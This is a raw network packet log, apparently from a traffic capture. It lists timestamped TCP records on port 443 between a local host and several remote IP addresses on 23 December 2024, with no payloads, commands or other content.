                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523087025 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523098946 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523150921 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523160934 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523238897 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523258924 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523278952 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523288965 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523293972 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523302078 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523308992 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523319960 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523341894 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523355007 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523355961 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523364067 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523377895 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523387909 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523394108 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523408890 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523412943 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523425102 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523437023 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523446083 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523459911 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523466110 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523502111 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523514986 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523525953 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523535013 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523542881 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523545980 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523571014 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523578882 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523597956 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523606062 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523621082 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523638010 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523646116 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523650885 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523660898 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523673058 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523691893 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523700953 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523705959 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:00.523710012 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.435936928 CET4434986094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.436022997 CET4434986094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.436047077 CET49860443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.436110020 CET49860443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.437141895 CET49860443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.437189102 CET4434986094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.527827978 CET4434987823.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.528170109 CET49878443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.528193951 CET4434987823.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.528556108 CET4434987823.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.528733015 CET4434987923.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.528980970 CET49878443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529045105 CET4434987823.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529198885 CET49879443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529232979 CET4434987923.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529536963 CET4434987923.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529863119 CET49879443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.529923916 CET4434987923.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.583100080 CET49878443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:01.583117962 CET49879443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.200515032 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.200562000 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.200752974 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.201107025 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.201122999 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.538364887 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.583340883 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.672072887 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.672156096 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.672158003 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.672327995 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.673371077 CET49868443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.673389912 CET4434986894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.789024115 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.789060116 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.789227009 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.789491892 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:02.789505005 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.132649899 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.133352995 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.133414030 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.184238911 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.184261084 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.514134884 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.514158964 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.514211893 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.515175104 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.515186071 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.608714104 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.608778000 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.609385967 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.609390020 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611228943 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611232042 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611309052 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611321926 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611326933 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611335993 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611375093 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611375093 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611380100 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611390114 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611423969 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611429930 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611444950 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611449957 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611459970 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611463070 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611506939 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611514091 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611520052 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611525059 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611526966 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611535072 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611552000 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611557007 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611608982 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611614943 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611624956 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611633062 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611638069 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611641884 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611690998 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611696959 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611704111 CET49882443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.611706972 CET4434988294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.684324980 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.684365988 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.684628010 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.684912920 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:03.684926987 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.021730900 CET49905443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.021759033 CET4434990520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.022090912 CET49905443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.023534060 CET49905443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.023544073 CET4434990520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.228719950 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.228759050 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.228832006 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.229315042 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.229331970 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.229965925 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.230005026 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.230067968 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.230434895 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.230452061 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.238485098 CET49908443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.238504887 CET44349908204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.238599062 CET49908443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.239274025 CET49908443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.239284039 CET44349908204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.239664078 CET49909443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.239691973 CET44349909204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.239737034 CET49909443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.240150928 CET49909443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.240159988 CET44349909204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.540389061 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.540676117 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.540699959 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.541728020 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.541805983 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.542856932 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.542942047 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.543119907 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.543127060 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.543150902 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.543200970 CET4434988820.189.173.14192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.583993912 CET49888443192.168.2.520.189.173.14
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.927994013 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.928306103 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.928319931 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.928772926 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.929184914 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.929254055 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.929585934 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.971323967 CET4434989718.164.116.39192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:04.974546909 CET49897443192.168.2.518.164.116.39
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.085081100 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.085279942 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.085922956 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.085932970 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088068008 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088073969 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088120937 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088129997 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088138103 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088141918 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088179111 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088184118 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088253975 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088263035 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088285923 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088294029 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088320017 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088325024 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088366985 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088375092 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088453054 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088462114 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088485956 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088494062 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088546038 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088553905 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088572025 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088582039 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088593006 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088597059 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088649988 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088658094 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088679075 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088690996 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088700056 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088712931 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088726044 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088732004 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088792086 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088799953 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088836908 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088845015 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088864088 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088874102 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088887930 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088892937 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088954926 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.088968039 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089102983 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089111090 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089122057 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089128017 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089149952 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089158058 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089184046 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089193106 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089243889 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089253902 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089373112 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089381933 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089406967 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089416027 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089433908 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089442968 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089457989 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089466095 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089488983 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089497089 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089507103 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089514017 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089529991 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089535952 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089555025 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089562893 CET4434990394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089581966 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089600086 CET49903443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:05.089617968 CET49903443192.168.2.594.130.188.57
